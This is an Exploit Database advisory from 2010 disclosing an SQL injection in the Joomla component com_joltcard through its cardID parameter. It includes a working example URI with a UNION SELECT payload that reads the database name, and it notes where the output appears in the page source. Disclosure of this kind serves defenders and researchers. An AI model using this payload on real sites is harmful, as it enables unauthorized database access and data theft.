Joomla! Component JoltCard 1.2.1 – SQL Injection

• Exploit Database
• 13 阅读

• 作者： Valentin
  日期： 2010-04-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12269/

• # Exploit Title: Joomla Component com_joltcard SQL Injection Vulnerability
  # Date: 17.04.2010
  # Author: Valentin
  # Category: webapps/0day
  # Version: unknown
  # Tested on: 
  # CVE :
  # Code : 
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
  |:: >> General Information 
  |:: Advisory/Exploit Title = Joomla Component com_joltcard SQL Injection Vulnerability
  |:: Author = Valentin Hoebel
  |:: Contact = valentin@xenuser.org
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Product information
  |:: Name = com_joltcard
  |:: Vendor = JOLT media
  |:: Vendor Website = http://jolt.ca/
  |:: Affected Version(s) = unknown
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
  |:: >> #1 Vulnerability
  |:: Type = SQL Injection
  |:: Vulnerable Parameter(s) = cardID
  |:: Example URI = index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--
  |:: Selected information gets only displayed within the HTML source code (look at <OBJECT> tag). 
  |::
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Additional Information
  |:: Advisory/Exploit Published = 17.04.2010
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Misc
  |:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
  |::
  |:: 
  [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]